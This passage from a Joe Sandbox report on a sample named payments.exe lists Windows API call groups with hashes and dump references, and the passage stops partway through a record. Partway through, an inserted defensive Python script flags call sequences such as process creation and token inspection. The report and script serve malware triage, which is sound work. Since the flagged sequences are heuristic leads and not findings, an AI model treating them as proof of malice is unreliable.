• Instruction Fuzzy Hash: A311E172A04314BFC7019BA8DC06ADE7BAA9B45351F044316FD21D33A1E7708E0097B4
APIs
Memory Dump Source
• Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_payments.jbxd
Similarity
• API ID: __cftoe_l__cftof_l__cftog_l__fltout2
• String ID:
• API String ID: 3016257755-0
• Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
• Instruction ID: ab353c564d3e2375f9d8c4acb42a4ca03556a8c64a99e6ec534b4d9ad523598f
• Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
• Instruction Fuzzy Hash: 6501493200014EBBCF1A5E84DC21DEE7F23BB18350B5A8559FE2859031D336DAB2BB81
APIs
• __lock.LIBCMT ref: 00CB7AD8
  • Part of subcall function 00CB7CF4: __mtinitlocknum.LIBCMT ref: 00CB7D06
  • Part of subcall function 00CB7CF4: EnterCriticalSection.KERNEL32(00000000,?,00CB7ADD,0000000D), ref: 00CB7D1F
• InterlockedIncrement.KERNEL32(?), ref: 00CB7AE5
• __lock.LIBCMT ref: 00CB7AF9
• ___addlocaleref.LIBCMT ref: 00CB7B17
Memory Dump Source
• Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_payments.jbxd
Similarity
• API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
• String ID:
• API String ID: 1687444384-0
• Opcode ID: 142d256a79f6b83ef4c211b4219b14e34f0e3ece4c39e3ba821679001437f9ff
• Instruction ID: 84e9cef2d6ed2793626247f4d9cfcced8fa1999e44a280e0dea96f948c0dc884
• Opcode Fuzzy Hash: 142d256a79f6b83ef4c211b4219b14e34f0e3ece4c39e3ba821679001437f9ff
• Instruction Fuzzy Hash: CF016D71444B00AFD720DF79D90578ABBF0EF40325F20890EA89A977A0CB74A684DF11
                                                                                                                          APIs
                                                                                                                          • _memset.LIBCMT ref: 00CFE33D
                                                                                                                          • _memset.LIBCMT ref: 00CFE34C
                                                                                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00D53D00,00D53D44), ref: 00CFE37B
                                                                                                                          • CloseHandle.KERNEL32 ref: 00CFE38D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _memset$CloseCreateHandleProcess
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3277943733-0
                                                                                                                          • Opcode ID: ac0005ec26a8c99e1b471ea64ef3cad4f44b7d9ca34e7a709b87d12d9343aaaa
                                                                                                                          • Instruction ID: ff11a250fc61cfa6338f1d4c0a000ab544e114691914b821091934bba76ea2bc
                                                                                                                          • Opcode Fuzzy Hash: ac0005ec26a8c99e1b471ea64ef3cad4f44b7d9ca34e7a709b87d12d9343aaaa
                                                                                                                          • Instruction Fuzzy Hash: 53F05EF1540304BAE6101B60AC45FB77E7CDB04796F004422BE08D62A2E7759E1096B8
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00CAAF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00CAAFE3
                                                                                                                            • Part of subcall function 00CAAF83: SelectObject.GDI32(?,00000000), ref: 00CAAFF2
                                                                                                                            • Part of subcall function 00CAAF83: BeginPath.GDI32(?), ref: 00CAB009
                                                                                                                            • Part of subcall function 00CAAF83: SelectObject.GDI32(?,00000000), ref: 00CAB033
                                                                                                                          • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00CFEA8E
                                                                                                                          • LineTo.GDI32(00000000,?,?), ref: 00CFEA9B
                                                                                                                          • EndPath.GDI32(00000000), ref: 00CFEAAB
                                                                                                                          • StrokePath.GDI32(00000000), ref: 00CFEAB9
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1539411459-0
                                                                                                                          • Opcode ID: 349c34bebaf56d000cbe8ec2bda087259614b98e0e8766c2e0f4c1d2c23c1378
                                                                                                                          • Instruction ID: 4facdfd9327d53c69a42c12bc56a33bae7eca85bff4c05ed58d8554500eec9ad
                                                                                                                          • Opcode Fuzzy Hash: 349c34bebaf56d000cbe8ec2bda087259614b98e0e8766c2e0f4c1d2c23c1378
                                                                                                                          • Instruction Fuzzy Hash: 06F05E31045359BBDB12AF94AC0DFCA3F5AAF0A311F048201FE11A12E1CB749662DBA6
                                                                                                                          APIs
                                                                                                                          • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00CCC84A
                                                                                                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 00CCC85D
                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00CCC864
                                                                                                                          • AttachThreadInput.USER32(00000000), ref: 00CCC86B
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2710830443-0
                                                                                                                          • Opcode ID: e58d3391f2f218709bf65267a0533027e28442f79cb0c1716d21d56229d0d572
                                                                                                                          • Instruction ID: 5600682df064cff3d04ecbf1c614efcdff5d8137b0d92a39da5ab1bd55a89822
                                                                                                                          • Opcode Fuzzy Hash: e58d3391f2f218709bf65267a0533027e28442f79cb0c1716d21d56229d0d572
                                                                                                                          • Instruction Fuzzy Hash: 8EE0F271141228BAEB201BA2DC4DFDB7F5DEB167A1F408025F60DC45A1CBB58582CBA0
                                                                                                                          APIs
                                                                                                                          • GetCurrentThread.KERNEL32 ref: 00CCB0D6
                                                                                                                          • OpenThreadToken.ADVAPI32(00000000,?,?,?,00CCAC9D), ref: 00CCB0DD
                                                                                                                          • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00CCAC9D), ref: 00CCB0EA
                                                                                                                          • OpenProcessToken.ADVAPI32(00000000,?,?,?,00CCAC9D), ref: 00CCB0F1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CurrentOpenProcessThreadToken
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3974789173-0
                                                                                                                          • Opcode ID: c103b79cd7403381ddf73c2d719fb7a3136446df87e72d6acd2fc364c2e5ac7e
                                                                                                                          • Instruction ID: 9ad000003eeb03cbb8931841bc5a1613a6dea42f2d96f4908f07a6bb3c7ba677
                                                                                                                          • Opcode Fuzzy Hash: c103b79cd7403381ddf73c2d719fb7a3136446df87e72d6acd2fc364c2e5ac7e
                                                                                                                          • Instruction Fuzzy Hash: E8E04F72601321BBD7205FB29D0DF873BA9AF55791F01C818E251D6140DF348442C770
                                                                                                                          APIs
                                                                                                                          • GetSysColor.USER32(00000008), ref: 00CAB496
                                                                                                                          • SetTextColor.GDI32(?,000000FF), ref: 00CAB4A0
                                                                                                                          • SetBkMode.GDI32(?,00000001), ref: 00CAB4B5
                                                                                                                          • GetStockObject.GDI32(00000005), ref: 00CAB4BD
                                                                                                                          • GetWindowDC.USER32(?,00000000), ref: 00D0DE2B
                                                                                                                          • GetPixel.GDI32(00000000,00000000,00000000), ref: 00D0DE38
                                                                                                                          • GetPixel.GDI32(00000000,?,00000000), ref: 00D0DE51
                                                                                                                          • GetPixel.GDI32(00000000,00000000,?), ref: 00D0DE6A
                                                                                                                          • GetPixel.GDI32(00000000,?,?), ref: 00D0DE8A
                                                                                                                          • ReleaseDC.USER32(?,00000000), ref: 00D0DE95
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1946975507-0
                                                                                                                          • Opcode ID: a04eabb5f354cc6a854cc1859850f97b94277343bb95a0d9aa9cd7ced8077e0c
                                                                                                                          • Instruction ID: e38772ef2d052af5b8b2811dc91f6c964dad17f561664d6dd65815238a752906
                                                                                                                          • Opcode Fuzzy Hash: a04eabb5f354cc6a854cc1859850f97b94277343bb95a0d9aa9cd7ced8077e0c
                                                                                                                          • Instruction Fuzzy Hash: 99E0E571100340BEDB215BB4EC09BD83B129B56335F14C656F679980E6C7754581DB31
                                                                                                                          APIs
                                                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00CCB2DF
                                                                                                                          • UnloadUserProfile.USERENV(?,?), ref: 00CCB2EB
                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00CCB2F4
                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00CCB2FC
                                                                                                                            • Part of subcall function 00CCAB24: GetProcessHeap.KERNEL32(00000000,?,00CCA848), ref: 00CCAB2B
                                                                                                                            • Part of subcall function 00CCAB24: HeapFree.KERNEL32(00000000), ref: 00CCAB32
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 146765662-0
                                                                                                                          • Opcode ID: 679d97c7661f112f88c260068aa55d7abe129843e36a33ba57e6c8e4277fb72f
                                                                                                                          • Instruction ID: 3f73cfa4fad6c9c9c5729a078806db6f65a696746e08b9b4139d56169b5518ab
                                                                                                                          • Opcode Fuzzy Hash: 679d97c7661f112f88c260068aa55d7abe129843e36a33ba57e6c8e4277fb72f
                                                                                                                          • Instruction Fuzzy Hash: B0E0BF36104205BBCB012B95DC08899FBA7FF89321310C221F625C1671CF329872EB61
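The records above are the call groups worth pulling out of a listing this long: CreateProcessW with dwCreationFlags 0x20 (NORMAL_PRIORITY_CLASS) followed by CloseHandle; SendMessageTimeoutW, GetWindowThreadProcessId and AttachThreadInput; OpenThreadToken followed by OpenProcessToken; WaitForSingleObject followed by UnloadUserProfile. What follows is an added example, not Joe Sandbox code and not part of payments.exe: a Python triage script that parses "APIs" records in this report format and flags ordered call sequences. The embedded SAMPLE is a constructed excerpt of four records from this page, the RULES table and its rule names are this example's own choices, and the creation-flag names are the Win32 SDK constants.

```python
"""Triage helper for the per-function API listings in a Joe Sandbox report.
Added example for this page, not Joe Sandbox code and not part of the analysed
sample. RULES and the rule names are this example's own choices."""
import re
from typing import Dict, List, Tuple

# One "• Api.MODULE(args), ref: ADDR" line, including the indented
# "Part of subcall function XXXXXXXX:" form used for callees.
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$")
# Metadata bullets such as "• API ID: ..." or "• Instruction Fuzzy Hash: ...".
FIELD_RE = re.compile(r"^\s*•\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*?)\s*$")

# dwCreationFlags bits for CreateProcess* (values from the Win32 SDK headers).
CREATION_FLAGS = {
    0x00000004: "CREATE_SUSPENDED", 0x00000008: "DETACHED_PROCESS",
    0x00000010: "CREATE_NEW_CONSOLE", 0x00000020: "NORMAL_PRIORITY_CLASS",
    0x00000400: "CREATE_UNICODE_ENVIRONMENT", 0x08000000: "CREATE_NO_WINDOW",
}
# Ordered API subsequences a record must contain to trigger a rule.
RULES = {
    "token inspection (thread, then process)": ["OpenThreadToken", "OpenProcessToken"],
    "input attached to a foreign window's thread": ["GetWindowThreadProcessId", "AttachThreadInput"],
    "child process launched": ["CreateProcessW"],
    "profile unloaded after waiting on a handle": ["WaitForSingleObject", "UnloadUserProfile"],
}

def parse_records(text: str) -> List[dict]:
    """One record per 'APIs' heading: its calls in listing order plus metadata fields."""
    records, cur = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            cur = {"calls": [], "fields": {}}
            records.append(cur)
            continue
        if cur is None:
            continue
        m = CALL_RE.match(line)
        if m:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            cur["calls"].append({"api": m["api"], "mod": m["mod"], "args": args,
                                 "ref": m["ref"], "subcall": m["sub"]})
            continue
        f = FIELD_RE.match(line)
        if f and f["key"] != "Associated":  # dump-file paths carry no metadata we use
            cur["fields"][f["key"]] = f["val"]
    return records

def in_order(calls: List[dict], pattern: List[str]) -> bool:
    """True if pattern occurs as an ordered subsequence of the record's API names."""
    names = iter(c["api"] for c in calls)
    return all(any(n == want for n in names) for want in pattern)

def decode_flags(value: str, table: Dict[int, str]) -> List[str]:
    """Expand a hex argument into named bits; '?' (unknown statically) gives []."""
    if not re.fullmatch(r"[0-9A-Fa-f]+", value):
        return []
    v = int(value, 16)
    return [name for bit, name in sorted(table.items()) if v & bit]

def triage(text: str) -> List[Tuple[str, str, str]]:
    """Return (API ID, rule name, detail) for each record that matches a rule."""
    out = []
    for rec in parse_records(text):
        api_id = rec["fields"].get("API ID", "?")
        for rule, pattern in RULES.items():
            if not in_order(rec["calls"], pattern):
                continue
            detail = ", ".join(f"{c['api']}@{c['ref']}" for c in rec["calls"] if c["api"] in pattern)
            for c in rec["calls"]:  # name the creation flags (6th CreateProcessW argument)
                if c["api"] == "CreateProcessW" and len(c["args"]) >= 6:
                    detail += " flags=" + "|".join(decode_flags(c["args"][5], CREATION_FLAGS) or ["?"])
            out.append((api_id, rule, detail))
    return out

# Constructed excerpt of the listing above (four of its records, trimmed).
SAMPLE = """\
APIs
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00D53D00,00D53D44), ref: 00CFE37B
• CloseHandle.KERNEL32 ref: 00CFE38D
• API ID: _memset$CloseCreateHandleProcess
APIs
• SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00CCC84A
• GetWindowThreadProcessId.USER32(?,00000000), ref: 00CCC85D
• AttachThreadInput.USER32(00000000), ref: 00CCC86B
• API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
APIs
• OpenThreadToken.ADVAPI32(00000000,?,?,?,00CCAC9D), ref: 00CCB0DD
• GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00CCAC9D), ref: 00CCB0EA
• OpenProcessToken.ADVAPI32(00000000,?,?,?,00CCAC9D), ref: 00CCB0F1
• API ID: CurrentOpenProcessThreadToken
APIs
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 00CCB2DF
• UnloadUserProfile.USERENV(?,?), ref: 00CCB2EB
  • Part of subcall function 00CCAB24: HeapFree.KERNEL32(00000000), ref: 00CCAB32
• API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
"""

if __name__ == "__main__":
    for api_id, rule, detail in triage(SAMPLE):
        print(f"[{rule}] {api_id}: {detail}")
```

Run it directly to print one line per matching record. Two caveats when reading the output. First, these sequences are what a GUI-automation runtime does for launching processes, driving another window's input (SendMessageTimeoutW here carries fuFlags 2, SMTO_ABORTIFHUNG, with a 0x1388 = 5000 ms timeout) and checking its own token, so on a binary the report already classes as a likely compiled AutoIt script a match points at runtime library code rather than at the script's own logic; treat it as a lead for where to look, not as a verdict. Second, a "?" argument means the value was not known statically, so decode_flags returns nothing for it instead of guessing.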
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2889604237-0
                                                                                                                          • Opcode ID: 3f4eabff430fed95da22abed55a100aea5ebd2f5625ee03e433d33befdd6384e
                                                                                                                          • Instruction ID: 742a75385cc4f49897b826c413a83dab3aefc04bfda928abe807aab452404ecc
                                                                                                                          • Opcode Fuzzy Hash: 3f4eabff430fed95da22abed55a100aea5ebd2f5625ee03e433d33befdd6384e
                                                                                                                          • Instruction Fuzzy Hash: 72E09AB1500318FFDB015FB098486AE7BA6EB4C365F11C816F95AC7351DF7498429B64
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2889604237-0
                                                                                                                          • Opcode ID: 385632c7d8074c167e38c723f25fd21a8887b3988b4ac7c621f946d68ff8b049
                                                                                                                          • Instruction ID: 0b537d296bfb07a9f33ca899509daa5189952e53c16c13202f1a98cad580f6bd
                                                                                                                          • Opcode Fuzzy Hash: 385632c7d8074c167e38c723f25fd21a8887b3988b4ac7c621f946d68ff8b049
                                                                                                                          • Instruction Fuzzy Hash: 45E046B1500308FFDB005FB0C8486AD7BAAEB4C364F11C809F95ACB320DF7898028B20
                                                                                                                          APIs
                                                                                                                          • OleSetContainedObject.OLE32(?,00000001), ref: 00CCDEAA
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ContainedObject
                                                                                                                          • String ID: AutoIt3GUI$Container
                                                                                                                          • API String ID: 3565006973-3941886329
                                                                                                                          • Opcode ID: 53c1bcb6f07d93d778ea9b1b95680859e467884b8b568d18692be83e4f935f62
                                                                                                                          • Instruction ID: 647642086ad98fa66fe2878c88bd26e0a5852d39c66337234c9d6897de099c1b
                                                                                                                          • Opcode Fuzzy Hash: 53c1bcb6f07d93d778ea9b1b95680859e467884b8b568d18692be83e4f935f62
                                                                                                                          • Instruction Fuzzy Hash: 3E911570600701AFDB14DF64C884F6ABBF9BF49710B10856DF95ACB691EB70E941CB60
                                                                                                                          APIs
                                                                                                                          • Sleep.KERNEL32(00000000), ref: 00CABCDA
                                                                                                                          • GlobalMemoryStatusEx.KERNEL32 ref: 00CABCF3
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: GlobalMemorySleepStatus
                                                                                                                          • String ID: @
                                                                                                                          • API String ID: 2783356886-2766056989
                                                                                                                          • Opcode ID: 421ee993556b18952d52b3fa1999c99778388c4a227b2a2265f30a24b1cf27c6
                                                                                                                          • Instruction ID: af357e3dbf27ff9ca4774206e2f17e8da99fce8c7ccf3395cf3b2646b166777e
                                                                                                                          • Opcode Fuzzy Hash: 421ee993556b18952d52b3fa1999c99778388c4a227b2a2265f30a24b1cf27c6
                                                                                                                          • Instruction Fuzzy Hash: 6A512B71408745ABE320AF14DC85BAFBBE8FF96358F41484DF1C8411A6EF708568D766
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00C944ED: __fread_nolock.LIBCMT ref: 00C9450B
                                                                                                                          • _wcscmp.LIBCMT ref: 00CDC65D
                                                                                                                          • _wcscmp.LIBCMT ref: 00CDC670
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _wcscmp$__fread_nolock
                                                                                                                          • String ID: FILE
                                                                                                                          • API String ID: 4029003684-3121273764
                                                                                                                          • Opcode ID: a3f309c11eaae70afff9b037a8acd6f5ea36f4d80dab01bdf93a72a478090091
                                                                                                                          • Instruction ID: ad5922e020f8544a7e471d4a6a27d3b2942f7e77e4c584382686de2376187c91
                                                                                                                          • Opcode Fuzzy Hash: a3f309c11eaae70afff9b037a8acd6f5ea36f4d80dab01bdf93a72a478090091
